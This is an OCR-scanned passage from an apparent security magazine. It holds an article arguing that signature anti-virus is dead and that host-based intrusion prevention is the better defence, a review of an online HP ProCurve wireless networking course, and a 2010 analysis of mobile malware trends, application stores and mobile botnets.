all major anti-virus vendors don't want to share 
their secret sauce knowledge bases and create 
a common naming convention, this problem 
will continue. With the advent of the Common 
Malware Enumeration (CME) standard, there 
could be one shared, neutral indexing capability 
for malware (see: http://cme.mitre.org/), but of 
course, it remains poorly supported by the anti- 
virus vendors. Only as a collective group of 
information security professionals and ethical 
hackers can we push these vendors to get out 
of the dark ages of proprietary and agree to 
common naming. Until then, malware outbreaks 
will continue to grow and be misdocumented. 
In addition, instead of a shared collective of 
proactive defenses, there shall continue to be 
reactive anti-virus vendors writing larger and 
larger updates to their proprietary MD5 hashed 
databases until they run out of space and we run 
out of patience. 

Malware Growth - Malware can be grown 
and harvested the same day of a vulnerability 
announcement. Freely available open source 
of exploit code on the Internet is enabling this 
phenomenon and it cannot be 
reversed. 

• Malware Methodology - Although 
the number and types of malware in 
the wild continues to rise exponentially, 
there are less than a dozen core 
methodologies used for their execution 
and proliferation. 

• Malware Persistence - Some 
malware exists indefinitely and 
can only be destroyed or removed 
by loss of data while most can be 
removed. Most malware will re-infect 
a host if the hole, also known as the 
Common Vulnerability and Exposure 
(CVE), is not removed (see: http:// 
cve.mitre.org/). 

• Malware Specificity - The majority 
of malware is target-independent, 
designed with one or more of only 
a limited number of recognizable goals. 
However, some of the most successful 
malware attacks against financial 
institutions and government agencies 
have been well targeted. 



Now that you have a basic 
understanding, let's dig even deeper 
into these immutable Laws of 
Malware and then you'll see why 
Anti-virus is DEAD. However, from 
the ashes of the 10,000,000 entry 
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MD5 hashed signature database, updated daily by 
Symantec, McAfee, Kaspersky, Trend Micro, Sophos 
and others, the phoenix rises - long live HIPS 
(Host-based Intrusion Prevention Systems). When 
you're finished reading my axioms, I'll take you into 
the world of HIPS - the most proactive defense 
against malware. I would like to tell you that HIPS 
is a brand new concept. It's not. If it weren't for 
BlacklCE acquired by ISS then IBM and now hiding 
somewhere in the Area 51 warehouse, just check out 
the message on their site: 
http://www. iss. net/support/blackice/FA Q. html 
and if you follow the link to download it, here's that 
link: 

http://www.iss.net/blackice/update_center/ 

The requested file is not available for download. 

This seems like bad news, doesn't it? BlacklCE nailed 
it - but this system ran on Windows 3.1 to start and 
is now long gone. However, like the light bulb, bright 
ideas don't just disappear. Read on and by the end of 
this article, you'll know what to look for in HIPS and 
where to look for HIPS. 

Malware Creation 

Malware is created by cyber terrorists, criminals and 
hackers (technically they are known as crackers but 
this is now mainstream terminology). Not all malware 
is created equal. Most are evolutionary improvements 
on existing malware. Typically, malware is created by 
taking advantage of commonly known vulnerabilities. 
These software holes are usually discovered by 
computer security experts and are added to the 
Common Vulnerabilities and Exposures (CVE®) 
data dictionary, owned and operated by the MITRE 
Corporation (see: http://cve.mitre.org/ and http: 
//nvd. nist.gov) with federal funding from the United 
States Department of Homeland Security. Malware 
can be created against CVEs in a 1:1 - one piece 
of malware for one CVE or many:1 - there can be 
many exploits for one CVE, coded differently but 
exploiting the same hole. Different malware for the 
same CVE are usually written on top of a single 
malware vector. For example, one malware for the 
Microsoft Windows RPC flaw is the Virus known as 
BAGEL, while another malware for this same hole is 
a worm known as SASSER. Both malware exploits 
rely on a small piece of code which tests to see if the 
Windows RPC protocol [APPLICATION or SERVICE) 
is answering requests (ENABLED) and if the buffer 
can be overflowed with data (EXPLOIT VECTOR). 

The formula for creating a piece of malware is quite 
simple: 

IF FLAWED APPLICATION or SERVICE ENABLED 
THEN ATTACK WITH EXPLOIT VECTOR. 



If this core malware code is successful, additional 
functionality is added by the creator or malware 
writer. This functionality can range from installing 
backdoors known as rootkits, Trojans, keyloggers, 
spyware, botnets, or zombies to mangling, stealing, 
and/or destroying data as well as ruthless denial of 
service attacks whereby the system being exploited is 
rendered useless or goes offline. 

Creating a blended threat is becoming very popular. 
These usually have MULTIPE EXPLOIT VECTORS 
bundled into a single package. A blended threat works 
quickly and maximizes damage by combining more 
than one malware vector. For example, some blended 
threats like BUGBEAR use the characteristics of both 
viruses and worms, while also exploiting one or more 
CVEs. Other well known blended threats of malware 
that caused tremendous financial damages and 
downtime include NIMDAand CODE RED. 

Malware Enumeration 

The average malware program currently has a dozen 
names. With the advent of the Common Malware 
Enumeration (CME) standard, there could be one 
shared, neutral indexing capability for malware. 
Because there are so many network security 
vendors in a fragmented marketplace, each touting 
to be the best and fastest at finding new exploits, 
they each currently use their own naming schema. 
For example, a well known piece of malware that 
attacks targets through the Messenger protocol 
on Windows platforms was named by one vendor 
as Backdoor . irs .Bot. However, another calls it worm 
ircbot.jk. Here are just a few of the names for this 
one piece of malware: 

Worm/IRCBot. 9374 

W32/Ircbot . TT Win32 /Cuebot . K! Worm 
Trojan. IRCBot-690 

Win32/IRCBot.OO W32/Graweg. A! tr .bdr BackDoor . Generic3 . G 
BB!CME-7 62 

Backdoor .Win32 . IRCBot . st backdoor : Win32/Graweg . B 

IRC-Mocbot!MS06-040 

W32/Oscarbot.KD.wor 

W32/Cuebot-M W32.Wargbot WORM_IRCBOT . JK 

All of the vendors agree that this piece of malware 
is a worm that opens an IRC back door on the 
compromised host. It spreads by exploiting the 
Microsoft Windows Server Service Remote Buffer 
Overflow Vulnerability (Microsoft Security Bulletin 
MS06-040). MITRE has named this one vulnerability 
under the Common Malware Enumeration (CME) 
convention CME-762. So what is CME and why 
should you care? CME was developed to address 
the pandemic model of malware in which CME 
identifiers are assigned to high-profile threats. As 
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defined by the CME Threat Assessment Focus Group 
comprised of vendors and user representatives, 
high-profile malware threats include considerable 
or notable malware threat(s) potentially confusing 
users, malware threats posing a considerable risk to 
a user, and/or malware that draw media attention. 
By visiting http://cme.mitre.org you will have a better 
understanding about the types of exploits which are 
attacking your network. Ultimately, if you push your 
HIPS vendor (don't waste your time with anti-virus 
vendors) to support CME, it could make things a lot 
easier for all of us. 

Malware Growth 

Malware can be grown and harvested the same day of 
a vulnerability announcement. Freely available open 
source of malware code on the Internet is enabling 
this phenomenon and it cannot be reversed. In all 
computer-based networks there is and always will 
be an inherent window of vulnerability. This is the 
time frame within which defensive countermeasures 
against attacks are reduced, compromised or non- 
existent. 

Numerous vendors tout self-defending and self- 
healing capabilities as well as real-time intrusion 
prevention, however the ability to prevent attacks 
requires foreknowledge that an exploit exists and 
what attack vector it uses. Predicting the future has 
never been a consistently reproducible trait in human 
existence, most importantly in the area of information 
security (INFOSEC), as evidenced in the billions of 
dollars spent in reparations from damages caused 
by malware. Many vendors have developed signature 
or anomaly detection methodologies to try to detect, 
deter or defend against malware. While signature 
methodologies require constant updates of new 
signatures, anomaly detection uses a predictive model 
to detect novel attacks but is prone to a high rate of 
false alarms. 

Once a new vulnerability is uncovered by an intelligent 
exploiter, the window of vulnerability reopens. The 
malware is usually developed quickly, as a derivative of 
prior work or open sources. It is usually launched on the 
unsuspecting targets the same day it is harvested. This 
is known as a ZERO-DAY EXPLOIT. Closing and re- 
opening the window of vulnerability is such a common 
phenomenon that there has become a major discussion 
about stopping these ZERO-DAY EXPLOITS in real- 
time. 

Although it is possible to produce more intelligent 
systems that utilize some combination of signature- 
based and real-time anomaly detection methodologies, 
there will always be yet another surprising malware 
that was grown on the same day a vulnerability was 
discovered and therefore successfully exploit some 
percentage of the network population. There will be no 



way to stop the growth, harvesting and deployment of 
malware that take advantage of this problem, unless 
the Internet no longer exists and networking becomes 
a thing of the past. This is why next-generation Host- 
based Intrusion Prevention (HIPS) shows promise in 
combating malware growth and propagation. 

Malware Methodology 

Although the number and types of malware in the wild 
continues to rise exponentially, there are less than 
a dozen core methodologies used for their execution 
and proliferation. All commonly known vulnerabilities are 
documented in a database at the National Vulnerability 
Database, http://nvd.nist.gov which is powered by 
MITRE's CVE® program. It is easy to search this 
database to learn much about the millions of pieces of 
malware that are out there in the wild by seeing what 
holes they exploit. Most of the most damaging malware 
take advantage of weaknesses or flaws in source code 
which has not been written to account for malicious 
exploits. For example, one of the most damaging 
exploits, known as SASSER, caused over a billion 
dollars in damage, yet it exploited a vulnerability that 
had been lingering in Windows source code for over 
a year. SASSER took advantage of a well-known flaw in 
the remote procedure call (RPC) interface into the Local 
Security Authority Subsystem Service (LSASS) of the 
Windows operating system. SASSER exploited a stack- 
based buffer overflow flaw which is documented as 
CVE-2003-0533. 

In addition to CVE and CME, there is yet one more 
program you should take a look at - it is called Common 
Weakness Enumeration or CWE. As malware usually 
exploits CVEs, the CVE would not exist if not for poorly 
written source code. The CWE program looks to define 
common weaknesses in software so we can develop better, 
harder solutions from the start. Take a look at this program 
at http://cwe.mitre.org as well as http://cce.mitre.org/lists/ 
cce_list.html, http://maec.mitre.org/language/enumera 
tions.html and finally http://capec.mitre.org/. 

Remote Network Malware 

SASSER is an example of one of the many exploits 
which target a vulnerability in software by using 
networking protocols to remotely connect and exploit 
the system without direct local access. 

Local Host Malware 

This type of malware requires installation of payload 
on the target computer system. Rootkits, Trojans, 
backdoors, keyloggers and viruses need to be locally 
installed or activated. Usually, a user visits an infected 
web page or receive an email which contains a script 
or executable object that they click on to install or 
download, thereby bypassing firewall and other 
security countermeasures. 
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Social Engineering Ma I ware 

Other exploits target weaknesses in end-users by 
presenting screens which appear to be from a trusted 
source, in order to obtain private information. This is 
known as a phishing malware. 

Denial of Service Malware 

These exploits usually take advantage of software, 
hardware and networking limitations of the target 
system to make a computer resource unavailable to its 
intended users. Usually a high profile web site or critical 
corporate networking resource such as a DNS server, 
router or mail server is the target. 

Malware Persistence 

Some exploits exist indefinitely and can only be 
destroyed or removed by loss of data while most can 
be removed. Most exploits will re-infect a host if the 
hole, also known as the Common Vulnerability and 
Exposure (CVE), is not removed. Some of the worst 
exploits to plague computer systems are known as 
rootkits, Trojans, adware and spyware. These exploits 
are very difficult to remove and some require that an 
operating system be reinstalled or a hard drive be wiped 
completely, including clearing the boot sector. 

Once a quarantining countermeasure is deployed, such 
as anti-spyware or anti-virus software has thoroughly 
scrubbed the target of the infecting malware, it is highly 
possible for the same malware to re-infect the target 
system. The main reason for this persistence is that the 
weakness being exploited has not been removed. 

Until the target has been hardened against attack, it 
can be repeatedly re-infected. Most end-users do not 
know how to rid their system of inherent weakness. Until 
the common vulnerabilities and exposures (CVEs) which 
are being exploited have been remediated, there is no 
guarantee that the same malware will not reappear. 

Removing CVEs is a difficult task. Some can be removed 
by stopping software services or closing ports which may 
be needed for end-user productivity. Other CVEs can't be 
removed until a secure software patch exists that closes 
the hole. Many times a vendor rushes a patch to market 
which closes one hole and opens another. Because 
many malicious exploits attach themselves to trusted 
applications, services and servers, it is very difficult to 
completely disinfect a computer network of all of these 
exploits. The larger and more complex the network 
becomes, the more daunting a task. Although numerous 
scrubbing tools have been developed, each one has too 
many false negative and false positive results to find and 
quarantine all exploits that have successfully attached 
themselves to trusted resources. 

Malware Specificity 

The majority of exploits are target-independent, 
designed with one or more of only a limited number of 



recognizable goals. Although once exploited, one feels 
personally invaded, the reality is that most exploits are 
target-independent. With the exception of specifically 
targeted phishing, pharming and information disclosure 
attacks, usually launched by cybercriminals against 
financial institutions, or cyber-terrorists and cyber- 
spies attacking government networks, most hackers, 
viruses, worms, Trojans, adware, spyware and other 
various blended threats have been developed and 
launched as blindly as the recent spam that Bill 
Gates received in his inbox at Microsoft. The spam 
reportedly had the subject line Become a Millionaire 

- Click here. 

Most exploits have been launched throughout the 
world, causing massive damages, data loss and 
downtime by being let loose into the wild of the Internet. 
If you read the Hacker Manifesto, you'll understand 
that a majority of exploiters seek fame en masse and 
therefore blindly launch exploits to see how far they will 
travel and how much damage they will cause. Again, 
the latest Malware that exists without a known signature 
is called zero day. Sometimes it takes weeks before 
major vendors have fully tested samples and written 
a signature test. Hence, as I've said in the beginning 
-Anti-virus is dead. It can no longer help you against 
the latest exploits - you must look elsewhere and this is 
where HIPS begins. 

So now that you've learned my immutable Laws of 
Malware, let's take a look at HIPS solutions and how 
they can help us against the nastiest threats. 

Host-based Intrusion Prevention (HIPS) 

Because so many Windows systems are compromised 

- especially laptops, you need to consider host-based 
intrusion prevention systems (HIPS). Simply put, 
HIPS blocks malicious software from functioning. The 
evolution of anti-virus will always be a newer, faster 
signature testing engine (even if they try to add HIPS) 
that's one step behind the latest malware attack. Look 
for a purely HIPS solution that blocks Zero Day malware 
without signature updates (heuristically), by default. It 
should help mitigate malware propagation, quarantine 
malware in real time and not be a CPU or memory hog, 
making the end-user PC unusable. 

I've been tracking and testing various HIPS solutions 
for the past few years and I've found a few that you 
might want to try out for yourself, for free. Remember, 
the commercial grade HIPS solutions cost money and 
you usually get what you pay for - free means it might 
work it might not and there may or may not be good 
documentation, help files or any support whatsoever. 
I make no guarantees about their ability to defend you, 
simply that they exist and that this is where to focus our 
energies when protecting computers (some of these 
have a 30 day free trial and then you have to pay to 
keep using them): 
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Defensewall: http://www.softsphere.com/localizations/ 
Emsisoft Antimalware: http://www.emsisoft.com/en/ 
software/antimalware/ 
Hitman Pro: http://www.surfright.nl/en 
Mark Jacob's Registry Watcher: http:// 
www.jacobsm.eom/mjsoft.htm#rgwtchr 
Prevx: http://www.prevx.com 
Spyware Terminator: http:/ /www. spy wareterminator 
. com/download/download, aspx 
ThreatFire: http://www.threatfire.com/ 
Winpatrol: http://www.winpatrol.com/ 

If you go to google and do this search HIPS host- 
based intrusion prevention system you'll probably find 
many more. In addition, there is a new HIPS solution 
just hitting the streets from my company, but I'm not 
here to self-plug, only to educate. 

How Host Intrusion Prevention Systems Work 

A HIPS acts like a real-time application, processes, 
services and memory firewall for requests made by 
an application program to the operating system in 
which it is running. The biggest challenge is to get 
a HIPS solution installed on a non-infected system. 
If the system is infected deeply at the kernel level or 
a rootkit is installed as low as the bios layer, it is nearly 
impossible for a HIPS solution to be 100% effective. 

If you can install the HIPS solution on a clean system, 
the chances of new (aka zero-day) malware gaining 
entry to this operating system are much less and to your 
benefit. The smarter, newer HIPS programs attempt to 
do all the work for you, in determining if an application 
is a threat. However, some HIPS solutions require you 
to make decisions such as which programs can be 
run. This process is usually divided into three areas 
- a white list, a grey list and a black list. The white list 
is a list of programs you and your HIPS solution trusts, 
the grey list are questionable programs that much be 
watched carefully and the black list are programs which 
cannot be run and which might have already been 
tested, found infected and quarantined. 

When looking for a good HIPS solution, make sure it 
has the following capabilities: 

• Process termination. Some malware will try to shut 
down firewalls and antivirus software. A good HIPS 
engine can control which programs can stop, halt or 
suspend other programs. 

• Which programs are allowed to execute. 
Unidentified malware can be blocked from running. 
The HIPS doesn't need to know that the program is 
malicious. It just needs to know that the program is 
not on the approved list. 

• Which files a program can have read/write 
permissions to access. A good HIPS engine 
will typically restrict access to operating system 



executable files (c:\windows32 in Windows, /usr and / 
bin in Linux) and configuration files (the registry in 

WindOWS, /etc in Linux). 

• How much CPU time a program can use. Nasty 
malware programs will typically use up a lot of CPU 
time, continuously trying to infect other files on your 
computer or an SMB file server or other computers 
on the network. 

• Access to network resources and the TCP/IP stack. 
Similar to a firewall, a good HIPS solution can 
control access to and from the local area network 
and the internet. 

There are many 
advantages to HIPS 
solutions. Some 
need no updates, so 
there is no need for 
a paid subscription. 
However, the best 
HIPS solutions deploy 
a hybrid approach 
the ability to 
heuristically determine 
that a program is malicious while also being able to 
match up its signature to a database or to decompile 
the program in real-time or to watch it in a sandbox 
and look for malware characteristics. As a result, new, 
unidentified malware, known as zero day exploits can 
be stopped immediately, while an anti-virus solution is 
usually hours or days too late. 

If properly deployed, a HIPS solution can provide 
a more pre-emptive and proactive solution to the growing 
number of new threats. Well built HIPS solutions don't 
eat up your hard drive, your CPU or your productivity 
like anti-virus programs. We should look towards HIPS 
as our future in defense against the latest threats - long 
live HIPS. HIPs HIPs Hurray! 
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Class on Demand Review 



Implementing Wireless Networks 
Using the HP ProCurve MultiService 
Mobility Solution 



Traditional IT training has always been in the classroom 
where you spend a week or two with strangers and 
just follow the instructor through the coursebook, but 
in recent years more and more courses are becoming 
available via online learning platforms. 

Class on Demand is one such company providing a 
wide variety of courses and I was given the opportunity 
to try out their Implementing Wireless Networks Using 
the HP ProCurve MultiService Mobility Solution course. 

This course describes how to address your business 
requirements with regard to designing, testing and 
implementing a complete solution using Multi Service 
networks. The course is broken down into 10 easy 
modules with each module running under 40 minutes, 
some are a lot shorter than this. 

By keeping it this short I feel that they manage to keep 
the viewer engaged with the course by providing just 
the right amount of information during the time period 
allowed. The instructor is clear and concise throughout 
and he actually appears to enjoy the information he is 
trying to convey across to the viewer, as even though he 
is likely to be reading from a script there isn't any of the 
usual monotone that you sometimes get with this type 
of training so you wont be falling asleep to this one! 

The application itself uses Silverlight so you will need 
to add this to your browser if you dont already have it. 
Initially I tried to use it on my Ubuntu but I found that it 
wouldn't work on my Ubuntu as the moonlight add-on 
to Firefox wouldn't play DRM protected media. Once I 
booted up into Windows and had the Silverlight addon 
installed to my Firefox, everything loaded up just fine. 

You are given three options on how you wish to view 
the training. Either in a small window, a full width of the 
web page or full screen. The player itself is very simple 
to use, with the usual controls of pause, stop play etc 
and volume control. The player was very responsive to 
any use of the controls and when changing the screen 
size through the three different options. The picture itself 
was smooth and clear throughout with a excellent sound 
levels, I didn't notice any tininess throughout the course 

For those of you who have never been involved in 
implementing the wireless solutions the first Module 
provides a good although a little brief overview of 802.11 
technology. Each module has a good description on 
what it information is contained within that section. The 
titles of each class clearly states what you will learn. 



http://www.classondemand.net/IT/catalog.aspx 
Cost: $995 
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Figure 1. 

The content provided was very detailed in my opinion, 
but not over the top technically so that I wasn't bombarded 
with too much information on a new subject. Being able 
to jump around on the course was quite handy for those 
moments when I wasn't sure on something I could quickly 
start up a previously viewed module to double check as 
the modules were always quick to load. 

I enjoyed this course throughout and found it very 
educational and informative as it was using something 
that I hadn't previously had any experience with (HP 
ProCurve MultiService Mobility), so it was good to 
actually have something to learn :) I have used various 
other online training courses in the past and this course 
was definitely in the top 3 regarding the content and 
information provided and the actual delivery of that 
content, as it was a pleasure to use. 

One thing I do have to mention is their superb 
technical support as I had an issue with the training not 
working for me all the time, and the response I received 
was fantastic. A more or less an immediate reply to 
my email and constant updates as to the progress of 
the issue. They worked hard to identify the issue and 
resolve it so that I was able to view the rest of the 
course in a very short space of time. I am still convinced 
it wasn't anything of their doing and it was my ISP that 
was at fault but they still made changes to allow me to 
continue on with the training. In my opinion the backup 
of any online training has to be excellent judge of the 
streaming service they will deliver, and this was an 
excellent example. 



MICHAEL MUNT 
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Mobile Malware - the new cyber threat 



An analysis of the potential malware threat to mobiles 



Mobile phone malware first appeared in June 2004 and it 
was called Cabir.The mobile-phone features at most risk 
are text messaging (using social engineering), contacts list, 
video and buffer overflows. GSM, GPS, Bluetooth, MMS and 
SMS will indeed be some of the attack vector to expect this 
year and beyond. 



Research earlier this year (2010) suggested that 
35% of all detected mobile malware operated 
via the Internet - so why the sharp rise in 
mobile malware? There is a perfectly logical answer 
to this - mobiles are fast becoming the primary device 
for accessing the internet. Another potential reason is 
the development of mobile application development 
which allows users to stay in touch using a Twitter or 
Facebook third-party application. 

Statistic: 35% of all detected mobile malware is 
operated via the Internet (2010) 

Gartner claims from recent research that mobiles 
accounted for 14.2% of the overall mobile market 
- malware and cyber criminals will no doubt be 
observing these trends closely. The 14.2% is 
expected to rise to nearly 20% by the end of 2010. 
The cost reductions associated with lower cost 
contract data tariffs has also contributed to this surge 
in demand for mobiles - so users are more willing 
to surf the internet using their mobile. You can now 
see clearly why cybercriminals see the mobile exploit 
opportunity. 

The mobile malware life cycle 

A few years ago mobile malware spread by Bluetooth; 
MMS; SMS, infecting files modifying/replacing icons; 
locking memory cards; and installing fake fonts. 
Now though, new technology has been adopted by 
cybercriminals - these include DDoS (damaging user 
data); disabling an operating system; downloading 
silent files from the internet; silent calling PRS/ 
International numbers; infecting USB sticks; and 
stealing mobile banking user login and password 
credentials. 



Mobile vendors/network operator 
responsibility 

Most of the mobile vendors and operators including the 
manufacturers have specific code signing procedures 
for installation of applications. Symbian were one of the 
first to adopt a rigorous application signing procedure 
with Apple following suit later. Android and Bada on the 
other hand have opened up their source to third-party 
applications and in effect handed over security to the 
mobile user. 

BlackBerry though has remained steadfast on believing 
that security is key which is why they are leading the 
way when it comes to operating system, application and 
third-party certification. The code signing approach is 
under attack though from companies such as Google 
(with Android) and Apple with its popular iPhone is also 
under attack from researchers, developers and analysts 
alike. 

Recently in 2010 the iPhone was jailbroken. This is 
when users remove the code signing restrictions on their 
iPhone which allows them to install any application they 
want. This though opens the door to cybercriminals. A 
jailbroken Apple iPhone has indeed been targeted by 
malware writers. Apple is responding though by starting 
to lock certain IDs out of the Apple Application Store 
which will inevitably lead to ALL jailbroken iPhones 
being locked out of the store. 

An iPhone utility that lets iPhone 4 owners run non- 
Apple approved applications was launched this month 
(August, 2010). Jailbreakme 2.0 works on all iPhone 
and iPod touches running on iOS4. The US legal 
establishment through the Copyright Office ruling has 
stated that the practice of removing restrictions on third- 
party applications fell under fair use guidelines. It's clear 
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that if Apple loses this case, application certification 
may well help trigger a mobile malware epidemic in 
years to come. 

If you want to find a platform to test your mobile 
malware on then there is no better operating system 
than Android. It goes out of its way to allow developers 
to self-sign their own application certificates. 

Statistic: Google Android phone shipments increase 
by 886%, Canalys, Aug 2010 

Take a closer look at the Android code signing and 
you will be alarmed to read that the trusted certificate 
authority requires that the certificate does not expire 
before October 22, 2033 - that works out at a certificate 
validity period of 25 years. Google has very much 
opened the door to malware writers with this and one 
suspects that this is the platform (see Figure 1 and 
statistic to see why) cybercriminals will use to distribute 
their malicious code and the botnet payloads of the 
future. 

Mobile attack vectors 

Mobile malware writers have a hard task to deliver their 
malicious payloads considering the multitude of mobile 
operating systems that are in the market. Consider the 
PC world and the main player is Microsoft - consider 
the mobile world and you have Symbian, Apple, 
BlackBerry, Android, Microsoft and Bada (Samsung) to 
name a few. 

It's very challenging indeed to spend time and 
money on developing malware for these different 
operating systems. Until we have a clear winner like 
in the PC world - think Microsoft, it is possible we 
will not see the surge in malware infected mobiles for 
another few years. That said, Cybercriminals appear 
to be concentrating some of their efforts (and money) 
in the mobile world - most likely just touching the 
edges. 

Figure 2 below from Kaspersky highlights 
that there were 39 new mobile malware 
families and 257 new mobile malware 
variants identified in 2009. This is in 
comparison to 30 new families and 143 
new modifications identified in 2008. 
Reference: Kaspersky, 2010 (c) 
In the past few years we have seen a 
variety of attacks targeting the Symbian 
S60 3rd edition as well as the standard 
SMS and MMS scam methods. There is 
also the applications that are developed 
(see next section)- most users have no 
idea what an application (regardless of 
whether it is third-party or not) is doing 
i.e. calling a remote server and racking 
up PRS/international rogue call charges 
without a users knowledge. 



Remote Server Calling is something that appeared 
in the latter part of last year. The remote hosted 
servers can be hacked for malicious data collection/ 
PRS sending; delivery of Trojans as well as deliver 
malicious payloads. Another attack vector will be 
Mobile Ready Malware or MRM to coin an acronym. 
MRM is where a mobile resident malware will be 
activated or updated from a remote server without the 
user ever knowing. 

The MRM method would work very much like a botnet 

- allowing mobiles (without the users knowledge) to 
connect to a remote server to commence uploading 
more malware to be delivered by a users contact book, 
SMS or MMS for example. 

Another attack vector could be DDoS. Denial of 
Service could bring down a mobile network - flooding 
the network with data packets. Therefore expect mobile 
data backup businesses to grow over the coming years 

- this will be a niche market over the coming years. 
Mobile banking is also going to increase. Android 
Marketplace recently approved a malicious application 
which masqueraded as the official First tech Credit 
Union banking application. It collected unsuspecting 
people's banking information. 

One particular trick of the malware writers is to hide 
any malicious program with legitimate applications. This 
will allow the malicious file to work silently undisturbed 
from users prying eyes. Another trick is to disable an 
application certificate check whereby a user will be 
unaware that an application is legitimate. These are 
simple methods that work. 

Application Stores - third-party applications 

There is clear evidence to suggest that there is 
strong correlation between the growth in the number 
of applications and the development of malware. 
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Figure 1 . Worldwide mobile market - Canalys, August 2010 (c) 
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Mobile application stores provide breeding grounds for 
malicious activity which then provides opportunity to 
test malicious applications. 

There are numerous attack methods available to the 
cybercriminal via these stores - PRS, SMS or MMS 
silent calling (as previously highlighted) as well as 
parsing sensitive phone data (contact book, calendar 
data, password files etc) to remote servers whereby 
your personal and financial data would be available to 
the highest bidder. 

Applications are developing rapidly with geo-tagging 
capability harnessing both GPS and cell site information 
to pin point your location within a few meters. In effect 
someone could watch you leave your home; track your 
whereabouts and collect useful information about you to 
steal your identity or worse burgle your home when they 
know you are not in. All this could be controlled/ initiated 
from thousands of miles away. 

Current third party application security issues stem 
from remote servers auto-dialling international phone 
numbers without the users consent. This leads to hefty 
invoices for unsuspecting users. Application stores 
have seen some large increases in growth in recent 
years. This large increase in application development 
has also helped increase the malware threat. See 
below: 

Mobile security vendor Lookout have identified 
across their install base 4 pieces of malware and 
spyware per 100 mobiles in December 2009 which 
has now increased to 9 pieces of malware and 
spyware per 100 mobiles by May 2010. That equates 
to more than double the prevalence of malware and 
spyware on mobiles in less than 6 months. Nearly 
all these have propagated through 
application stores. 
Reference: Lookout 2010 (c) 



With the rate at which mobiles are 
growing, and with the number of 
applications being downloaded projected 
to reach 50 billion, it is clear to see why 
malware is also increasing. Malware 
writers are beginning to see the exploit 
opportunity. 

The Android Application store is one 
such store that doesn't provide much 
in the way of high level application 
certification. Google recently pulled 
dozens of unauthorised mobile- 
banking applications from its Android 
Marketplace. The applications priced at 
$1.50 were made by a developer named 
09Droid and claimed to offer access to 
accounts at many of the world's banks. Figure 2. Mobile Malware Comparison Trends for 2008 and 2009, Kaspersky(c) 



Google said it pulled the applications because they 
violated its trademark policy. 

The application itself was actually useless - it didn't 
do anything malicious either but it could have collected 
customer banking credentials. Android unlike Apple or 
BlackBerry do not have employees who are vetting 
applications which is a serious security and trust 
issue. 

The Future 

No one is entirely sure (in the mobile security world) 
why mobiles continue to use default TCP/IP functionality 
and allow access to API's; these two channels allow for 
malware propagation. The mobile botnet has in a small 
way arrived allowing malware writers the opportunity to 
incorporate remote control channels into their mobile 
applications. 

Mobile application websites allow developers 
complete access to the TCP/IP stack within 
smartphones thereby allowing them more API 
functionality which in turn allows them to have greater 
access to a smartphones operating system. The current 
attack vector as previously highlighted has mainly been 
through Trojans or mobile application stores, MMS or 
desktop synchronisation software/software updates. 
The mobile botnet hasn't really taken off yet, due in part 
to the multitude of operating systems, but one suspects 
this might be about to change. See Google Android 
story discussed earlier. 

The biggest challenge for the creators of botnets is 
the financial prospect. At the moment there isn't much 
of a financial incentive to develop mobile botnets when 
there are significant financial returns to be made in 
the PC botnet market. The costs of developing mobile 
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botnets are considerably higher than for PC-based 
malware. Expect botnet convergence in the future but 
not quite yet. 

In July of this year (201 0), Symbian Series 60 handsets 
were used to create a botnet. 100,000 smartphones 
had apparently been compromised with the botnet. 
The malware posed as a game and was programmed 
to send SMS messages from compromised mobile 
devices. The botnets sent an SMS to the entire contact 
book or to some contacts - it also connected to a remote 
server. The malware would then delete sent messages 
from the Outbox and SMS log. 

Safeguarding the mobile future 

As for safeguarding your current mobile device, Fujitsu 
for example has already begun rolling out fingerprint 
based biometric security across some of its range and 
in the near future voice or even inner-ear activated 
devices will be widely available, allowing corporations 
to protect their data fully when it's not in use. Other uses 
could include individual workspaces within a single 
device, enabling a user to pick the device up and have 
his or her data downloaded automatically, once their 
identity has been confirmed - a function which could 
prove invaluable with shared hardware. 



As our mobiles become less exception and more 
norm the concept of all forms of necessary data being 
held within our device is gathering momentum. Our 
credit cards, passports, insurance documents etc. could 
all be carried around with us in our hip pocket, securely 
protected and unable to be used without our presence. 
This is a very scary thought. 

Final Thoughts 

The mobile botnets of tomorrow will no doubt 
increasingly look like the PC-based botnets we see 
today. The mobile telecommunication carriers will also 
face huge challenges both in securing their network 
from denial of service attacks and protecting user's 
smartphones from botnet and Trojan attacks. 
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